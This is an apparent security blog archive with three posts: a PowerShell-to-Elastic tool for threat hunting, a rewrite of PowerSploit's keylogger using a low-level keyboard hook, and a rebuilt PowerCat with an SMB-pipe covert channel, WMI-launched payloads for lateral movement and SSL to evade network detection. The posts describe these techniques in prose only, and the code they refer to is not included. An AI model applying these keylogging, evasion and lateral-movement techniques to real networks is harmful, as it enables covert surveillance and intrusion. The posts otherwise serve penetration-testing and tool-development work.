Tuesday, February 16, 2016

PowerStash: Accelerating the Hunt with Elastic

Ever since I was a PowerShell Padawan, I've been told that proper output comes in the form of an object. But what do you do with those objects? You could write them to disk as comma-separated-values with the built-in Export-Csv cmdlet, or better yet as XML via Export-Clixml. However, when hunting in an enterprise network, collecting potentially millions of forensic artifacts, the scalability of CSV and XML diminishes quickly. What you really need, Chancho, is a pair of stretchy pants.

You've probably heard of the ELK stack: Elastic (formerly Elasticsearch), Logstash, and Kibana. Elastic being the NoSQL search engine, Logstash handling data insertion, and Kibana providing the web-based UI. As the title of this post entails, I've taken a PowerShell approach to replacing Logstash's functionality. While Logstash is great, it does have limitations. For example, to collect all of the event logs from a Windows domain you'd need to install a log forwarder on each machine to send their event logs to Logstash. Thankfully, PowerShell's built-in cmdlets for retrieving data coupled with Elastic's open-source nature has made the marriage of these two capabilities fairly straightforward. Not only that, but with PowerShell we can get so much more than event logs. Let's get started.

The first, and most important, thing is to configure an Elastic instance capable of handling the amount of data we're going to throw at it. There are plenty of write-ups on how to tune Elastic, so I won't write one here; I took my pointers directly from Brad Lhotsky's outline for a write-heavy configuration. Next we need to code, wait I already did that part (or at least started it) for you. Realistically, I've written a light binding for Elasticsearch.Net, but it is more than capable of stashing all the things. Please feel free to contribute to the project and expand the binding I've started.

Elasticsearch.Net provides access to all of Elastic's APIs, primarily in the form of a client that knows how to interact with an Elastic instance. All that really needs to be done is to instantiate a client that matches your Elastic configuration. There are a couple ways to do this with PowerStash via New-ElasticClient. Let's start simple.
For a more complex configuration, start by creating a connection pool, which feeds into a connection configuration, and finally into a fully configured client.

To index a lot of information quickly, Elastic's Bulk API is paramount and used exclusively in PowerStash since it can index a single object/document, or many. To use the Bulk API, object's being indexed into Elastic need to be converted into the proper format using New-BulkIndexRequest. Conversion is a pretty short order, thanks to PowerShell's ConvertTo-Json cmdlet, as illustrated below.

Weaving these pieces together results in a scalable replacement for writing objects to disk with Export-Csv/Clixml... Export-Elastic. Which I've written to work similarly to the aforementioned exporters.

For objects to be indexed correctly they need to have a few specific properties. Elastic has date/time formats that must be used; so if your objects have any [DateTime] properties, they need to be converted. Additionally, every object being indexed needs to have a uuid "Id" property; in Windows that's a guid. To let PowerStash handle the indexing, every object also needs to have a DateCreated property and a TypeName. I've applied these changes to the Win32_NTLogEvent object below.

One of the awesome things about Elastic is its type inference, but in testing I found that it's best to create an index template so Elastic knows explicitly what your objects' types are. An index template is a simple JSON representation that needs to be sent to Elastic, as follows.

The only thing left to do is ramp up the data collection for stress-testing. I've gotten pretty good throughput, ~18k objects per minute, by running the collection in a separate runspace and exporting objects to Elastic on the main thread as data is returned. I've provided the functionality to do this via Invoke-Powerstash. I'd love for you to test this for yourself and report back how well it worked, or if it's failing. Combining PowerStash with a tool like CimSweep has the potential to bring enterprise hunting to a manageable level.

Tuesday, January 19, 2016

Scripting A Windows Key Logger

I recently seized the opportunity to contribute to a project, PowerSploit, that I've often used for reference and gleaned a wealth of knowledge from. An issue was opened for the project's key-logger the day after Christmas 2015, and as I hastily skimmed through my emails before deleting them I stopped for a moment to read it. Coldalfred writes, "When i execute as default or -PollingInterval 100 or 10000 or 40 that is the default make the Powershell process consume a lot of CPU that is normal?" I had some free-time to kill, so I decided to investigate the issue to determine if it might be fixable.

I was able to verify the issue Coldalfred reported. As it turns out, the PollingInterval parameter was not successfully being passed into the initialization routine. This parameter sets a sleep statement designed to throttle the key-checking loop. PowerShell's Start-Sleep cmdlet throws a non-terminating error when null values are supplied as input, but since this particular instance was executed as a background job it wasn't readily apparent the error was occurring. In addition to masking this error, the use of jobs was causing excessive memory consumption. My initial intent was to repair the PollingInterval parameter and replace the background job with a runspace. Below is a truncated code-snippet to highlight the situation.

By this time, the project's creator had closed Coldalfred's already known issue commenting, "...SetWindowsHookEx would make for a much better keylogger but that would require placing a DLL on disk." The benefit of using SetWindowsHookEx is that you can hook all processes in a desktop simultaneously and guarantee delivery of their key messages as they happen, rather than exhaustively checking the state of every key via GetAsyncKeystate and missing at least a few. I did some research into this idea and came across an interesting piece by Hans Passant. Hans explains that there are actually two hook types that don't require a DLL, and one of them is for low-level keyboard messages. The key to this type of hook is the use of a loop that checks for messages in the queue, after setting the hook. The PeekMessage function is used below to check the queue with a filter specifying only keyboard messages (0x100,0x109) be retrieved for processing.

Even though PowerShell and C# both run atop the .NET framework and have interoperability with the Windows API, getting PowerShell to do things that seem trivial in C# can sometimes require a bit of ingenuity. This happened to be one of those times. The use of SetWindowsHookEx relies on an application-defined LowLevelKeyboardProc callback function to process the keyboard messages it retrieves. This means I have to convince an unmanaged API function to execute managed .NET scripting as a callback function. Thankfully, I'd read about working with unmanaged callback functions in PowerShell during previous internet wanderings and was able to successfully implement it, as demonstrated below.

All that's left to do is wrap everything up, drop it into a separate runspace, and execute.

The entire, non-truncated, source can be found here.

Tuesday, January 12, 2016


I don't think there are any members of the InfoSec community who aren't familiar with the TCP/IP Swiss army knife, that is Netcat. So naturally when I learned that someone had written a similar tool in PowerShell, I was intrigued. It was months after learning about Mick Douglas's and Luke Baggett's original version of PowerCat that I actually tried out the tool and reviewed its implementation. What Mick and Luke started was quite ingenious, and I must give credit where it is due. However, I think most people would agree that the code's lack of adherence to PowerShell best practices made it very difficult to follow and contribute to. Contributors did, however, file issues for excessive CPU usage, file transfers not working, unexpected errors, and inoperable functionality; one pull-request also attempted to add SSL encryption. All of this inspired me to dismantle and rebuild their work from the ground up.

During my dismantling I discovered that calls were being made to external binaries. As an amateur PowerShell purist, I was determined to remove these external dependencies and replace them with equivalent .NET implementations. In particular, Netstat was being used to test for available ports and Nslookup was being used to craftily communicate with dnscat2 (very cool). I was able to write a helper function to replace Netstat. I ended up removing the dnscat2 functionality to exclude Nslookup, but I hope you'll agree that I made up for this by adding a covert channel of my own; more on that later.

Further along, I realized that the capture of command output had been over-engineered by redirecting the standard out/error of a process and attempting to asynchronously read from those streams. This required the use of additional functions and is the first contributor to excessive CPU usage. I found a simple remedy to this situation by running all user input in a scriptblock and letting PowerShell handle the output and errors for me.

What started as 40 lines of code...

...was reduced to less than 10 lines, and no extra function definitions.

Moreover, the excessive CPU usage arose from a by-design loop that continuously checks for completed asynchronous operations without any throttle control. You can test a simplified version of this yourself by opening Task Manager and having a look at PowerShell's CPU statistics while running the following one-liners.

With the CPU consumption cured, I was able to start sprinkling in my own improvements. Most notably, making up for the removal of dnscat2 functionality by adding in a covert communication channel that leverages SMB pipes for stealth. The beauty of SMB pipes is two-fold. First, they communicate over a port (445) that has to be open in a Windows domain and is usually open by default in non-domain scenarios. Second, all SMB pipe communications are owned by the System process; i.e. PID 4. This makes it especially difficult for investigators to determine that the connection was actually originating from PowerShell.
There is one caveat to the SMB pipe communications, in that the .NET classes supporting them weren't available until version 3.5.1. While this technically means that SMB pipes aren't fully supported in PowerShell v2, most machines that only have v2 installed also have .NET 3.5.1 installed. In my testing, the SMB pipes work flawlessly on Windows 7 with v2; but I have not tested back to Windows Vista or XP. With a covert comms-channel back in the mix, we can move on to weaponizing this code for field use.

Mick and Luke did a great job of packaging the code for execution and I used their implementation as the basis for my own. I've received several requests (and will likely oblige them in the near future) to package all of my version into a single script so that it will be more portable. My standard response to this request is that the packaging feature already exists via New-PowerCatPayload. This function was designed for weaponizing and outputs a customized script payload perfect for distribution to remote machines. Lets look at an example of how to do that, using WMI.
With just two lines, the payload is created and running by abusing the Create method of WMI's Win32_Process class. As shown above, Invoke-WmiMethod reports that it successfully created (ReturnValue = 0) a new process with PID 6800. The host PowerShell's PID is 2740 and the working directory is C:\Users, connecting to the PowerCat listener changes the working directory to C:\Windows\System32 and is now executing from PID 6800. A TCP-callback payload, pictured below, works a little differently. Create a new payload that specifies your machine as the -RemoteIp. Start your local TCP listener first, then use WMI to execute the TCP payload on a remote machine. In these examples everything is running on the local machine. To run this on a remote machine the -ComputerName parameter must be specified to Invoke-WmiMethod. This is a very simple way to move laterally through a network.
The final piece of this puzzle was to hide PowerCat's traffic from network detection mechanisms using encryption. In a pull-request to Mick and Luke's project there was an implementation of self-signed X509 certificate creation and SSL encryption, adding 595 lines of code to the project. I was quite pleased to discover that there is actually a COM interface for creating X509 certificates and was able to create my own helper function with only 50 lines of code. SSL, check. You can find the entire project here.